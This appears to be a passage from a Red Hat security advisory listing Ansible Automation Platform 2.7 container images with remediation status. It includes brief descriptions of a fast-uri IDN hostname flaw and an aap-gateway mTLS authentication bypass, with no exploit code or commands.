| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64 | — |
Workaround
|
A flaw was found in fast-uri. This vulnerability occurs because fast-uri fails to properly convert Unicode (Internationalized Domain Name - IDN) hostnames for HTTP-family URLs. This can lead to a situation where security policies, such as denylists or redirect validations, are bypassed when applications use fast-uri to enforce these policies before passing the URL to another parser. A remote attacker could exploit this to circumvent security controls and potentially access unauthorized resources or perform malicious redirects.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64 | — |
Workaround
|
A flaw was found in aap-gateway, a component of Ansible Automation Platform's Event-Driven Ansible (EDA). An unauthenticated remote attacker can bypass mutual Transport Layer Security (mTLS) authentication for event streams. This is achieved by manipulating the event stream URL and forging the HTTP Subject header. The system also inadvertently discloses the expected certificate subject in error messages, which simplifies the attack. This vulnerability allows an attacker to inject arbitrary events into EDA, potentially triggering automated workflows.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64 | — |
Workaround
|
|
